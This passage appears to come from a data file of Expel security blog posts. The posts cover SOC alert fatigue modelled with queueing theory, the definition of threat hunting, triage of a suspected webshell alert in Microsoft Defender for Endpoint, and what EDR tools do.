changes. It\u2019s best to make sure that you understand the system first. The system Using broad brush strokes, all systems that process work items (or jobs) can be boiled down to three basic elements: jobs, processors and buffers. Jobs are the work items that flow through the system and get processed. Lucy and Ethel had chocolates, the security world has alerts, incidents, engagements and the like. Processors are the things that \u201cdo\u201d the work. These are people and machines who take one thing and turn it into something else. This definition includes everything from Lucy and Ethel, who process chocolates by wrapping them, to your SIEM that takes a bunch of log data and correlates it together as a single security alert. Buffers are components that allow a looser coupling between one processor and another. They primarily function during burst demand to keep the system from collapsing. There are three primary types of buffers: Capacity: You can add more people/processors to your production system. This is what happens when your grocery store adds more checkout people during a rush. Inventory: You can store up work to do later when a processor is idle. Anytime you see a warehouse or a table of parts in a workshop, you\u2019re looking at a buffer. Security teams, sadly, do not benefit from these \u2013 inventory does not exist in the security world. Time: You can take longer to produce something. Ever been to the DMV? If so, you\u2019ve experienced a time-based buffer. The three elements of systems Okay, I\u2019m going to warn you that this is where things get a little nerdy (and a little math-y). If you thought it was nerdy before, then well \u2026 brace! But rest assured the math will lead us to a place of better understanding. Here goes. Every production system involves some configuration of the three elements above, organized to optimize for some outcome. For example, if chocolate arrives on the conveyor belt at an average rate \u03bb, and Lucy and Ethel can each wrap chocolates on average, we can show the chocolate factory schematically like this: If chocolate arrives on the conveyor belt at an average rate that equals the average processing rate, then everything will be ducky, right? Wrong! And this is where things begin to go off the rails for our heroines, and many times, for hapless security operations teams. Variation: the source of security operations potholes If you watch the video closely you may notice that Lucy and Ethel were doing OK for the first little bit. Then Lucy misses a step and starts to stumble. From this point on, they\u2019re doomed 1 . The issue here is variation. If a job takes too long, then the next one gets started late, and the next one, and so on \u2013 the system will never catch up. In the real world, processors aren\u2019t perfect: a chocolate is hard to pick up, alerts turn into investigations, attackers get creative \u2013 variation is in everything. And when quality begins to slip, this problem can compound \u2013 unwrapped chocolates may be returned for re-work, increasing the input rate and causing the problem to get worse. With this in mind, we\u2019re better off viewing the chocolate factory more like this: Chocolate is still arriving at an average rate of \u03bb, and being serviced at an average rate of , but now there\u2019s variation in these rates (as indicated by standard deviation or \ud835\udf0e).This variation is the root of many a smoking crater in the security operation center (SOC). Waltz or hip hop in the SOC? The intricate dance between variation and utilization. In the event of a big burst of inbound work like Valentine\u2019s Day at the flower shop (or a new signature set from an IDS vendor), most production managers will ask the team to \u201cdig deep\u201d and work a little harder to clear the backlog. In more formal terms, the manager is increasing utilization, which may increase throughput. What\u2019s not entirely obvious, though, is that this also makes the system more fragile. Why? You guessed it \u2026 variation. In SOC operations, alert processing time is often a big concern. Attackers are on the move and people want to know \u201chow long will it take us to go from a signal to a reaction?\u201d To see how the relationship between variance and utilization impacts alert processing time, it\u2019s helpful to express the relationship mathematically (in this case with the Kingman approximation 2 ). In case math isn\u2019t your thing, what this equation says is that the estimated service time is related to the variance in the arrival and service times (V or ), the utilization of the processor (U or ) and the average service time \u03bc s . Let\u2019s make a few assumptions to turn this equation into a real example: Alerts arrive, on average, every 10 minutes. The standard deviation is three minutes, so On average, it takes you two minutes to triage them, with a standard deviation of four minutes (they vary wildly), so Your utilization is 70 percent, so Based on those assumptions, the equation tells us that the average alert wait time will be: In case deciphering equations isn\u2019t your thing, what this means is that it will take about 9.47 minutes before an alert gets reviewed in this system. This is a little tight, but probably alright since the alerts are only arriving every 10 minutes on average . As the variance in our process increases, the alert wait time will increase. This makes sense since our analysts will be spending more time on some of the alerts, which forces newer alerts to wait longer. This is compounded by utilization. If we, like Lucy and Ethel, are already at 90 percent capacity and a single variation happens, it can knock us off our game. The chart below shows the effects of increasing variation at two different utilizations: 70 and 90 percent. The wait time in the process with 90 percent utilization increases much faster than when there is a buffer to absorb it. There are a few interesting things about this relationship, which can help us plan better: The average service time is one of three factors that contribute to service time. Making each member of your team faster is not the only thing in play. The utilization term tells us that operating a SOC team (aka a processor) at close to full capacity will magnify any variance in the system. If Lucy had time to correct her first mistake, the episode would have been less funny because she would have had some buffer to recover. The inclusion of variance as a term is a bit more abstract. In a toll booth you separate out the people with E-ZPass/FasTrak and the people who pay with bills so you don\u2019t stick a bunch of fast people behind someone paying with change they\u2019re still digging out of their seat cushions. Perhaps the most important thing this equation tells us is that these quantities are multiplicatively related \u2013 small changes in variance in a system that is already at 90 percent utilization will be catastrophic to service time. Similarly, small changes in utilization have the potential to move the needle quite a bit. That\u2019s enough math. What does it mean for my SOC? Let\u2019s say you\u2019re a CISO with a team of three that\u2019s buried in 200,000 alerts a day. What should you do? And how does any of this help? Good question, here\u2019s a rough schematic to use as a strawman: Given this diagram, let\u2019s look at the knobs we can turn: Inventory buffers : While our SIEM is useful to provide a little rate-decoupling, it\u2019s not really an option to store the alerts and work them next week \u2013 the attacker won\u2019t wait on us. Quality : We can\u2019t reduce the quality of our work to speed it up. We\u2019d miss things and that would be bad\u2122. We\u2019re not without hope though, there are still some dials we can turn: Dial #1: Tune your devices (arrival rate) It goes without saying that if the average arrival rate exceeds the average service time, you\u2019re hosed. As we learned above, if the average arrival rate equals the average service time, then the system is iffy at best. Tuning your devices is the number one way to adjust arrival rate. SIEM and IDS technologies are legendary for the \u2018firehose of alerts\u2019 problem. Investing time in filtering and tuning these, or investing in technology with a higher signal-to-noise ratio is probably the number one thing you can do. Guard against purchasing additional gear without tuning existing devices \u2014 new signal compounds the problem. Dial #2: Increase alert triage efficiency (service rate) The time it takes to process an alert is: Measuring these times, or at least having a rough idea of how long they take is instructive: If 99 percent of all alerts are closed out during triage, then investment there will have the biggest bang. Automating alert enrichment and providing context will speed up triage, while training your SOC analysts can boost capacity so each analyst can handle more alerts. To decrease the time to investigate, endpoint detection and response (EDR) or network forensic tools are your first stop. Many shops skimp here, and that may be a mistake. If one investigation takes eight hours because it has to be done manually it can easily swamp a small team. An EDR tool could reduce investigative time to an hour or less. Dial #3: Hire more analysts (capacity) If, after optimizing the time it takes to triage a single alert, your service rate is still lower than your arrival rate, you\u2019ve got to add capacity. That means hiring analysts. This can be an expensive proposition , though there are alternatives . Dial #4: Variance (aka the unexpected) As the Kingman equation shows us, the variance that\u2019s so pervasive in security operations can uncork an otherwise well-regulated system. There are two components to this: Arrival rate \u2013 if your team comes in every morning to a flurry of new work, consider staffing a night shift. This can keep the work from building up and smooth out the workflow. Outside of that, there\u2019s really not much you can do to adjust this variance. Service Rate \u2013 there are two things that can help here: automation and training. Experience tells us that training should almost always be our first stop \u2013 in the world of cheap python scripts and API-driven applications, human variance is by far the more pernicious of the two. Conclusion Alert fatigue in a SOC is a real problem and one that just about every organization has to deal with. It\u2019s such a problem that \u2013 for better or worse \u2013 there\u2019s an entire SOC role whose sole job is to help cope with it. The problem that many organizations encounter when they try to address alert fatigue is that they don\u2019t take the time to understand the system that they\u2019re trying to change. Instead, they just start making changes. Lots of times those changes include tweaks to their processes intended to achieve admirable-sounding outcomes like \u201creduce the time it takes to investigate a security incident.\u201d But if you don\u2019t take the time to understand the system, you can get some undesirable outcomes. For example, you might reduce the time it takes to investigate a security incident only to find that you\u2019ve unwittingly changed your system in such a way that you\u2019re now missing actual security incidents. If you\u2019re a fire chief, it doesn\u2019t make a lot of sense to put Ferrari engines in fire trucks so you can get to the fires faster. So, before you implement your SOC metrics program , before you start tweaking your SOC processes and before you start making staffing adjustments, take the time to understand the system that you\u2019re operating so you know how changes to that system will impact its operation. After all, there\u2019s only so much chocolate that two people can stomach if the system goes off the rails. ___________ 1 It does not help that the assembly line actually sped up during the scene, but the result would have been the same at a constant rate. 2 For the sake of simplicity, we\u2019re modeling the single processor case. In normal SOC operations, you\u2019d use the G/G/c form of this." +} \ No newline at end of file diff --git a/what-is-cyber-threat-hunting-and-where-do-you-start.json b/what-is-cyber-threat-hunting-and-where-do-you-start.json new file mode 100644 index 0000000000000000000000000000000000000000..a30d30cf2b7c0e879a7e2d9b5f8cf76566547e07 --- /dev/null +++ b/what-is-cyber-threat-hunting-and-where-do-you-start.json @@ -0,0 +1,6 @@ +{ + "title": "What is (cyber) threat hunting and where do you start?", + "url": "https://expel.com/blog/what-is-cyber-threat-hunting-and-where-do-you-start/", + "date": "Apr 9, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG What is (cyber) threat hunting and where do you start? Security operations \u00b7 5 MIN READ \u00b7 JEN BIELSKI \u00b7 APR 9, 2018 \u00b7 TAGS: Example / Hunting / Mission / Overview Sometimes the security landscape seems like a big game of telephone. A buzzword pops up. It may even be a good one. But then it enters the vendor echo chamber. Everyone starts repeating it to each other. The vendors CEO says \u201cWe\u2019ve got to put that on our website.\u201d The sales VP says \u201cWe\u2019ve got to put that on our tradeshow booth.\u201d And before long everyone in infosec is sayin\u2019 it but nobody really knows what it means. Usually it\u2019s defined as whatever the definer is doing. It\u2019s kinda funny. But it\u2019s really not. Because if you\u2019re charged with making your organization more secure you\u2019re left wondering what\u2019s real(ly important) and whether you should care. The term \u201chunting\u201d is a good example. It has been kicking around for almost seven years since it was first introduced in 2011 . The fact that it\u2019s had more time to marinate than some of the newer buzzwords may be why it\u2019s so confusing. Whatever the reason, at Expel we want to demystify what hunting is and what it\u2019s not. So here goes nothin\u2019. What is hunting? In short, hunting is a proactive effort that applies a hypothesis to discover suspicious activity that may have slipped by your security devices. Now, that doesn\u2019t mean you can\u2019t use your security tools to go hunting (we\u2019ll get to that in a bit). But looking at alerts coming from your endpoint detection and response (EDR) tool isn\u2019t hunting. It\u2019s alert management. And pretty much anything on this list also isn\u2019t hunting. Comparison of hunting vs. alert management Here\u2019s another way to think about it. With hunting you\u2019re assuming that something has already failed and you\u2019ve been compromised. The attacker has gotten past the perimeter (aka inside the network) and you\u2019re looking for them. Since you don\u2019t know where the attacker is hiding or who they\u2019re trying to impersonate you\u2019ll need to start with a theory based on common tactics attackers use. Then, once you know how you plan to seek out the attacker you\u2019ll need to look to take a closer look to identify activity that looks a little off. Things that don\u2019t look normal become investigative leads for an analyst to further review. Hunting process overview Example: Finding stolen user credentials (aka \u201cYou can\u2019t travel that fast!\u201d) Attackers use lots of different methods to steal user credentials so they can blend in with normal activity and avoid suspicion. But when attackers use those stolen credentials to access a system their location is usually drastically different from the user\u2019s real location. For example, an attacker in New York could login with stolen credentials and \u2026 thirty minutes later the real user could login in Los Angeles. Planes just don\u2019t fly that fast (not to mention TSA). By reviewing the location of successful user logins, you can identify login activity that is too geographically disparate to represent legitimate user travel. Here\u2019s what that would look like if we applied the process we outlined above. Hunting technique example: finding compromised accounts using login geo-infeasibility What do you need to start hunting (the basics) Now that we\u2019ve talked about what hunting is, let\u2019s identify the basic tools you\u2019ll need to hunt. Here\u2019s your shopping list starting from the hardest to find, to the easiest. 1. Someone (or some people) to do the hunting: That\u2019s right. Hunting requires humans. Or at least human judgment to evaluate the data you collect. If you\u2019re lucky, you may already have someone to perform this task. But if you\u2019re smaller, or your security program is still maturing you\u2019ll have to go hunting (heh) for someone. And that can be tough . Good threat hunters have typically done a stint on an incident response team, they\u2019re itching to do some forensics and they\u2019ve probably reversed at least one piece of malware just for fun. To translate, they\u2019re not cheap, or easy to find. And once you find them you need to keep them (which can be easier said than done ). Of course, if you decide you don\u2019t want to or can\u2019t find your own hunters, there\u2019s a line of security vendors and managed detection and response (MDR) providers that would love to help you. 2. Security device to collect data: Once you\u2019ve sorted out the pesky people problem, your next task will be to feed them some data. For that, you\u2019ll need security devices. Endpoint detection and response (EDR) tools are a good place to start, but they\u2019re not the be-all-end-all. Endpoints are a source of the truth, but your firewalls, SIEM or network forensics tool also collect data with crucial details for identifying malicious activity and filling out the story. The more data you can collect, the more you can hunt for. But don\u2019t get hung up on the tools. At a minimum, if you\u2019ve got either an endpoint or a network tool you\u2019ve got what you need to get started. 3. A list of things to hunt for: Finally, you\u2019ll need to decide what you want to hunt for. Knowing the tactic you want to sleuth out will guide the data you\u2019ll need to collect and what outliers to look for. The MITRE ATT&CK framework is a good starting point. In fact, it\u2019s what we use here at Expel. It outlines the tactics and techniques attackers commonly use at each stage of the attack lifecycle. As you consider what you want to hunt for you\u2019ll have to make sure that you have tools that can feed you the specific type of data you need. And be realistic about how much time you have. If you choose to outsource your hunting capability, make sure you ask your service provider to explain how they\u2019ll be hunting and how their techniques align with the security tools you\u2019ve got. If their answers are squishy, it\u2019s time to move on. Is hunting right for your organization? Now that we\u2019ve (hopefully) taken some of the mystery out of hunting you may be wondering if it\u2019s something that should even be on your radar. While it does provide an extra level of security, it\u2019s not practical for every organization to implement a hunting program. We recommend evaluating your risks and resources to determine if you should develop a hunting program. If you operate in a high-risk (and highly targeted) environment \u2013 think banks, defense contractors and companies that store large amounts of personal and financial information \u2013 then hunting probably makes sense because there are lots of adversaries trying to infiltrate your network. But if your organization\u2019s risk profile is medium- to low-risk, you\u2019re likely the target of commodity malware and should evaluate where your resources are most needed. In that case, hunting can take up a lot of time and distract you from things that should probably be much higher on the priority list like effective anti-phishing controls, asset management, third-party assessments and a myriad of other things that make up an effective cyber risk program. Doing security right is difficult, and focusing on hunting when you should be focusing on building a more secure foundation can actually make you less secure. Either way, you should make a conscious decision about whether you\u2019re hunting or not. Don\u2019t accidentally start hunting because your staff started chasing shiny things and found themselves looking at suspicious activity all over your network. That said, if you decide a formal hunting program makes sense here are two good places to start. 1 \u201cCredential access\u201d. MITRE tactic description, https://attack.mitre.org/wiki/Credential_Access 2 \u201cLateral movement\u201d. MITRE tactic description, https://attack.mitre.org/wiki/Lateral_Movement 3 \u201cExecution\u201d. MITRE tactic description, https://attack.mitre.org/wiki/Execution" +} \ No newline at end of file diff --git a/what-is-windows-defender-atp-is-it-any-good-expel-io.json b/what-is-windows-defender-atp-is-it-any-good-expel-io.json new file mode 100644 index 0000000000000000000000000000000000000000..4ea46d0fbbb7b602faa195364edbbad4b40d75d8 --- /dev/null +++ b/what-is-windows-defender-atp-is-it-any-good-expel-io.json @@ -0,0 +1,6 @@ +{ + "title": "What is Windows Defender ATP & Is It Any Good? - Expel.io", + "url": "https://expel.com/blog/windows-defender-atp-our-two-cents/", + "date": "Sep 1, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Is Microsoft Defender for Endpoint good? Security operations \u00b7 8 MIN READ \u00b7 TYLER FORNES AND MYLES SATTERFIELD \u00b7 SEP 1, 2020 \u00b7 TAGS: Alert / EDR / Get technical / Managed detection and response / SIEM It\u2019s no secret that the industry has eyes for Defender for Endpoint. After a few months of using and integrating it with our platform, we feel the same. In a few other posts, we\u2019ve shared our thought process on how we think about security operations at scale and the decision support we provide our analysts through our robots. In short, Defender for Endpoint made it really easy for us to get to our standard of investigative quality and response time without requiring the heavy lift to get the features we needed upfront. So what is Microsoft Defender for Endpoint? Microsoft Defender for Endpoint is an enterprise endpoint security product that supports Mac, Linux and Windows operating systems. There are a ton of cool things that Defender for Endpoint does at an administrative level (such as attack surface reduction and configurable remediation) however from our vantage point, we know it best for its detection and response capabilities. Defender for Endpoint is unique because not only does it combine an EDR and anti-virus (AV) detection engine into the same product, but for Windows 10 hosts this functionality is built into the operating system (removing the need to install an endpoint agent). With an appropriate Microsoft license, Defender for Endpoint and Windows 10 provide out of the box protection without the need to mass-deploy software or provision sensors across your fleet. What is EDR and how do these tools help us When we integrate with an endpoint detection and response (EDR) product, our goal is to predict the investigative questions that an analyst is going to ask and then have the robot perform the action of getting the necessary data from that tool. This frees up our analyst to make the decision . We think Defender for Endpoint provides the right toolset for helping us easily reach that goal via its API. Why Microsoft Defender for Endpoint is the best Thanks to Defender for Endpoint\u2019s robust APIs, we augmented its capability to provide upfront decision support to our analysts that arms them with the answers to the basic investigative questions that we ask ourselves with every alert. To find these answers, there\u2019s a few specific capabilities of Defender for Endpoint that we tap into that allow us to pull this information into each alert. This way, our analysts don\u2019t need to worry about using the tool, but instead, get to focus on analyzing the rich data that it provides: Advanced hunting database Prevalence information Detailed process logging AV actions Like we mentioned, Defender for Endpoint is an amazing investigative tool out of the box, but it only gets better once you start peeking under the hood. Our favorite for Endpoint feature? The API. Here at Expel, robots are our friends. They help us with decision support. This is what enables our analysts to focus on making decisions rather than worrying about how to use 30+ different technologies to gather the data we need to answer investigative questions. To be effective, our robots must not only be good at collecting the data needed but preparing it for interpretation as well. Therefore our robots aren\u2019t just good at collecting data, they also translate it into a format our analysts can easily work with and is consistent across multiple technologies. With Defender\u2019s rich API, we have an opportunity to replicate the manual scoping actions our analysts would take in the console and perform them automatically in our own platform. Now that we\u2019ve written our love letter to Defender for Endpoint, we\u2019ll show you a real example of how we use this tool to triage an alert. Triaging an alert using Microsoft Defender for Endpoint First things first: here\u2019s how we break down an alert. At a high level, we\u2019re looking to answer five basic investigative questions: What is it? Where is it? How did we detect it? How did it get there? When did it get there? Defender for Endpoint\u2019s features help us easily answer these questions. Here\u2019s an example of what a Defender for Endpoint alert looks like when it initially comes through the Expel Workbench: Initial lead of suspicious commands Here\u2019s what we know What is it? Suspicious net commands being run by this user Where is it? One host How did we detect it? EDR alert \u2013 execution of suspicious commands What we don\u2019t know, how and when did it get here Now to answer the money questions. We need to ask ourselves the last two of our investigative questions ( How did it get there? When did it get there? ) to understand how we will need to proceed in our investigation. And, as with any investigation, they will require additional data to answer. An analyst\u2019s measure of a good EDR platform will always be biased towards whether or not the data they need is available, easy to obtain and to understand. In our experience, Defender for Endpoint does an excellent job of anticipating these questions and providing easy access to detailed process information that allows an analyst to quickly and confidently make decisions. To highlight this, let\u2019s attempt to answer How did it get there? using some of the data provided to us with the Defender for Endpoint alert. Our favorite way to answer this? The Alert Process tree. Process tree of activity flagged in the alert As analysts, we love to see a nice process tree (like the one you see above). Being able to visualize the lineage of a process is extremely helpful, especially when time is of the essence. Defender for Endpoint presents us with a detailed hierarchy of the processes involved in an alert, marking anything it believes to be suspicious with a yellow lightning bolt. By looking at the process tree, we can easily identify that the suspicious net commands spawned from the parent process \u201chttpd.exe.\u201d Why is this detail relevant? This is common behavior associated with webshells from a remote attacker. By knowing this, we now have evidence to suggest an anomalous process relationship and likely an incident. With a suspected webshell on the brain, now we have a little bit of clarity on how these suspicious commands were executed. But two important questions still remain: How did this webshell get here? When did the webshell first enter the environment? Again, these are high-level questions and an experienced analyst is naturally going to attempt to identify the sources and frequency of the webshell interaction as well. But regardless, the Timeline feature of the Incident pane allows us to answer all of these. Check out this output when we search for the process \u201chttpd.exe\u201d on the alerted host. Timeline view to filter network connections from the httpd.exe process We can answer When did it get there? by filtering network connections, helping us clearly identify network connections related to the suspicious \u201chttpd.exe\u201d activity and determining the time they first started. More than likely, these connections are the Command and Control we would expect from webshell interaction; containing the \u201cnet\u201d commands that we were alerted to initially. Seeing the whole picture With just a few tools in the Defender for Endpoint console, we can easily scope this activity and answer all five of our initial investigative questions. What is it? Reconnaissance commands being executed by an attacker Where is it? One host (Web application host) How did we detect it? EDR alert \u2013 execution of suspicious commands How did it get there? A webshell deployed through an application vulnerability When did it get there? A few hours prior to our original alert How do we use Defender\u2019s features to our advantage? If you asked a robot what it\u2019s job at Expel is, it would likely respond in a JSON blob. JSON is great for transferring and formatting data in an efficient way, but it\u2019s not great for a human to read. Therefore outside of just collecting the data, our robots are also responsible for making this data ready for interpretation by an analyst in a format that is readable and consistent. So how do our robots pull this off? Well, our robots speak API. It all starts with them being able to ask some very simple questions of Defender for Endpoint. We\u2019ve found that Defender for Endpoint has a rich API that allows us to automate our entire triage process. Let\u2019s take a look at what this looks like with our lead alert. Defender for Endpoint Alert decision support Prevalence Information Where is it? As an analyst, this is probably one of the first (and most powerful) questions you can ask yourself in an investigation. The lower the prevalence, the more likely you\u2019re looking at something out of place. The way we do this with Defender for Endpoint is by normalizing the process arguments that were alerted on, and query for them in the Advanced Hunting Database . As you can see above, our analysts immediately know that in the past seven days these commands are completely unique compared to the one host we\u2019re already investigating. We can see this by looking at how common these process arguments are in the environment. We also do this with the normalized file path to help identify whether or not the alerted activity is being executed out of an abnormal location, or is simply a commonly installed binary in the environment by showing us everywhere the file is seen. With this information we can easily spot legitimate binaries in abnormal locations, or spoofed binaries that are executing out of legitimate directories. Defender for Endpoint Alert decision support Auto-Timeline Generation Your next logical question as an analyst is usually: How did it get there? We anticipate this and provide a timeline of the activity that occurred in a five minute window around the time of the alert. Since this comes with the alert, there\u2019s no wasting time learning a query language, logging into the console, waiting for the query to run and parsing the data. All in all, we save at least five to 10 minutes per alert when this data is retrieved and interpreted by our robot. This data comes back in a normalized CSV format so an analyst can easily open and filter that data in Excel. Below, you\u2019ll see an example of an automatic timeline generated for the host involved in the alert. Defender for Endpoint Decision support Our Timeline format is very simple, and emulates the format in which we keep our master incident Timelines. That way we can easily take data from multiple sources and combine them into a master Timeline that tracks an incident across multiple hosts, users and organizations (note that columns are redacted). Timeline acquired through our robots in CSV format AV Actions One of the greatest features of Defender for Endpoint is its configurable remediation policies. As defenders we usually want to know pretty early on whether or not a specific file was allowed to execute, or was blocked/ended by Defender for Endpoint at runtime. Our robots reach out to get us that context on each alert, and alert us to what Defender for Endpoint action was applied to the suspicious activity (if any) so that we can make smarter decisions about our response. For example, no one wants to spin up an incident for a blocked stage one download, but if the second stage was allowed to execute \u2013 let\u2019s call in the troops. In the example below we see that a file matching a signature for the Skeeyah trojan was identified and blocked at runtime. Before having to prove execution, we now know the scope is limited to simply answering one question ( How did it get here? ) rather than a bunch of post-exploitation questions right off the bat: What other actions happened as a result? What C2 did it communicate with? How many other machines are infected? We save a lot of time knowing this up front as there is no ambiguity on the action taken by the tool or having to parse detailed logs to find this information. Defender for Endpoint Decision Support Putting it all Together The decision support Defender for Endpoint enables us to generate is powerful because it allows us to become specialists at analysis rather than specialists of a specific technology. Don\u2019t get us wrong, there are always benefits to knowing the tool. But a carpenter building a house isn\u2019t usually the same person who forged the hammer. Decision support allows us to be flexible in the tools that we\u2019re using but also to be consistent in the response we provide to our customers. By standardizing the investigative questions and building our robots to answer those questions automatically, we can uplevel the capability of our analysts. Defender for Endpoint provides a platform that allows our analysts to quickly and accurately answer important questions during an investigation. But most importantly, having these capabilities emulated in the API allowed us to build on top of the Defender for Endpoint platform to be more efficient in our goal of providing high-quality detection and response across multiple organizations. Have questions? Let\u2019s chat ." +} \ No newline at end of file diff --git a/what-s-endpoint-detection-and-response-edr.json b/what-s-endpoint-detection-and-response-edr.json new file mode 100644 index 0000000000000000000000000000000000000000..08da0c980f2e88748c1ded606deecde98d68e36d --- /dev/null +++ b/what-s-endpoint-detection-and-response-edr.json @@ -0,0 +1,6 @@ +{ + "title": "What's endpoint detection and response (EDR)?", + "url": "https://expel.com/blog/whats-endpoint-detection-and-response-edr/", + "date": "Dec 6, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG What\u2019s endpoint detection and response (EDR) and when should you care? Security operations \u00b7 3 MIN READ \u00b7 GRANT OVIATT \u00b7 DEC 6, 2017 \u00b7 TAGS: EDR / Selecting tech / Tools Perhaps you\u2019ve heard AV is dead, or maybe someone tossed around the EDR acronym in a meeting and you had to Google it. You might even just be skeptical of what an EDR can do. In any case, the constant drumbeat of new products makes it harder than ever to keep current with security solutions. It\u2019s easy to become desensitized to all of the market hype. In this blog post, I\u2019m going to try to cut through the hype and explain what EDR products can do for you. If you\u2019ve ever been skeptical of EDR vendor promises, but curious if they can solve real security problems\u2026 you\u2019ve come to the right place. What is EDR? Endpoint detection and response (EDR) tools are a new(ish) category of security solutions. They require you to install an agent on each endpoint. In return, you\u2019re able to record and store endpoint system behaviors and events. These events typically include tracking processes, registry alterations, file system activity and network connections on all hosts where the agent is installed. Security teams can use this event stream to detect and investigate suspicious activity that occurs in their environment. What are the three most important things an EDR tool will do for me? Give you visibility into behaviors, not just indicators of compromise Attacker tools aren\u2019t stagnant, so why should your detections be? EDR solutions enable you to detect more than just a filename or hash match by providing a simple way to collect, store, and search host-based events. Changing a single byte in a file can ruin an indicator of compromise. But the broader techniques that lead to a compromise change far less frequently. EDR products use the events they collect to identify suspicious process relationships, unusual network connections, potential credential theft and lots of other behaviors that can help you identify a potential compromise faster. Most EDR products even allow you to inject your own expertise into the device by augmenting its out-of-the-box detection behaviors with your own rules. Answer security questions at scale Ever wonder how many hosts in your environment are using a particular piece of vulnerable software? Or, perhaps what hosts have gone to a particular known-bad domain? Has an investigation ever left you asking \u201cIs this activity normal?\u201d These are all questions you can quickly answer when you have an EDR solution to query collected file, network, and process events across your environment. And they\u2019re not just valuable when you\u2019re responding to an incident. They also arm you with valuable data you can use for proactive threat hunting. Help you respond faster It\u2019s probably obvious that you can respond faster when you can easily get additional context on alerts by searching events from all your endpoints. But what happens when there\u2019s a specific file, registry key or process that needs closer inspection \u2014 beyond the event stream? Luckily, most EDR solutions eliminate the need to physically chase down the laptop or server in question by empowering you with remote file acquisition, file listing, registry listing, and in some cases, even memory analysis capabilities. \u2026and a few things EDR tools won\u2019t do Be a complete replacement for your antivirus While antivirus and EDR solutions are slowly converging, they\u2019re still two distinct offerings. Traditional AV blocks known-bad indicators that commonly plague enterprise environments. EDR solutions complement that by giving you a way to perform root cause analysis on specific incidents, identify all infected hosts, and even contain them in some cases\u2013 but most won\u2019t prevent compromise in the first place. Be the last detection solution you\u2019ll ever buy While EDR tools provide tremendous visibility and insight into your network, they aren\u2019t substitutions for your IDS/IPS, next-gen firewalls or good old-fashioned security policies. You\u2019ll get a ton of value from your ability to detect and respond rapidly to threats, but don\u2019t mistake them for being a comprehensive solution. A substitute for having an investigative process and mindset The conclusions you take away from your EDR tool will be directly proportional to the expertise of the analysts using it. EDR tools will collect, store and make events easy to search \u2014 but a human still needs to interpret the events in a meaningful way. In short, the benefits of an EDR can be entirely lost on a team that isn\u2019t prepared to use them. Train your team, hone your process , and your EDR tool will become an invaluable asset. Should you buy an EDR? So, now that we\u2019ve covered what EDR tools are (and aren\u2019t) how do you know if you\u2019re ready to take the plunge and buy one? Well\u2026 if these three points describe you\u2026 you should definitely take a look. You want to up-level your detection and investigative capabilities You understand that an EDR tool isn\u2019t going to replace your AV solution You\u2019re prepared to invest the time and expertise required to use an EDR tool effectively" +} \ No newline at end of file diff --git a/what-s-hunting-and-is-it-worth-it.json b/what-s-hunting-and-is-it-worth-it.json new file mode 100644 index 0000000000000000000000000000000000000000..835f291b3c9f197e5c96a84d77817d28611a44c4 --- /dev/null +++ b/what-s-hunting-and-is-it-worth-it.json @@ -0,0 +1,6 @@ +{ + "title": "What's hunting and is it worth it?", + "url": "https://expel.com/blog/whats-hunting-and-is-it-worth-it/", + "date": "Dec 21, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG What\u2019s hunting and is it worth it? Security operations \u00b7 4 MIN READ \u00b7 BRYAN GERALDO \u00b7 DEC 21, 2021 \u00b7 TAGS: Cloud security / MDR The value of hunting is a source of ongoing conversation and debate within the security industry. For some, hunting is a no-brainer, while others have intentionally delayed the adoption of this more novel approach to security. Why the debate? A few reasons. First, there are a lot of misconceptions and conflicting views about what hunting is and how it should be implemented. That\u2019s because there isn\u2019t an industry-adopted definition of hunting. Then there are the limited expertise, competing priorities, and organizational tensions that impact security teams\u2019 ability to adopt an effective hunting program. Not to mention the budget constraints that exacerbate the issue by forcing some orgs to rely on the bare minimum to secure their infrastructure \u2013 either delaying the adoption of a hunting program or implementing one that\u2019s sub-optimal. Expel has taken a side in this debate. In this blog post, I\u2019m going to explain what hunting is, the value it provides, and share how we use hunting here at Expel. What\u2019s hunting? TL;DR: Hunting is the act of proactively looking for threats and/or anomalous activity in an environment that may have been missed by your security tools. But, like I mentioned, you won\u2019t find an industry agreed-upon definition of hunting today, which can lead to misunderstandings about what hunting is and who does it. For example, hunting efforts focused strictly on retrospective data analysis using known indicators of compromise (IOCs) after a large-scale attack or hunting services that are primarily automated are often marketed as a comprehensive hunting solution. But they often fall short on the scope, visibility, and reach you can or should expect from proactive hunting. At its core, hunting is scientific, rooted in the practice of setting up an experiment to test a hypothesis. Hunting \u2018experiments\u2019 are based on both known and unknown attacker behaviors. Hunting \u2018hypotheses\u2019 are based on the assumption that bad actors slipped past your detections. Hunting \u2018tests\u2019 involve analyzing a large set of data (your raw logs) over a period of time (30 days for us) and focus on abnormal behaviors and patterns. Hunting is complex. It requires experienced talent, a dash of creativity, and effective tools. It also requires the time and space to effectively implement and maintain a threat hunting program. This can prove challenging for many orgs, especially those still struggling to understand the value or benefits of hunting. On top of that the low number of results typically found in a hunting exercise is a good sign for secure environments, but can lead to a low perceived value of hunting. Despite these challenges, security-forward companies have recognized the growing importance of threat hunting, and those who have implemented hunting programs find themselves ahead of the next attack instead of waiting for it. The benefits of hunting In our experience, there are characteristics of a mature hunting program that bring numerous benefits to organizations, including but not limited to: Helping uplift existing SOC detections by focusing on finding behaviors that are missed by existing security tools. Over time, enhancing existing tools with new and novel detection patterns. Further validations for the existence of an incident. Improving the overall quality of existing threat intelligence (like data) by helping shape threat intelligence research efforts. Helping to alleviate management anxieties by providing greater coverage of monitoring and analysis throughout the infrastructure. With Expel, for example, we\u2019ve enabled several enterprise customers to move beyond simply focusing on IOC-based hunts in one environment (which is still important) to extending their threat hunting coverage across their environment with a larger, diverse set of hunting techniques. From our perspective, the benefits of hunting are many. Some of our favorites include: Attention to both known and unknown threats. Reduced attacker dwell times (time spent undetected in the environment) Faster time to containment. Minimized risk of lateral movement, spread, and exfiltration. A full view (beyond threats) that helps you better understand your environment And we\u2019re not the only ones that feel that way. An increased number of industry experts, research studies, and reports mention or highlight the benefits of hunting. NIST\u2019s latest publication (Rev5) of NIST SP 800-53 acknowledges the usefulness of hunting to help identify evolving threats and, for the first time ever, introduced a control for threat hunting in section RA-10. This change tells us that orgs are starting to understand the significance of threat hunting. Yet many orgs struggle with finding the talent, time, or resources to hunt full-time, which makes prioritizing threat hunting especially difficult. Why Expel loves hunting Here at Expel , we believe there\u2019s another potential benefit to hunting that\u2019s frequently overlooked. Beyond identifying evolving threats, hunting is great for gaining more visibility into how your infrastructure (on-prem and/or cloud) is working (or not working). We consider 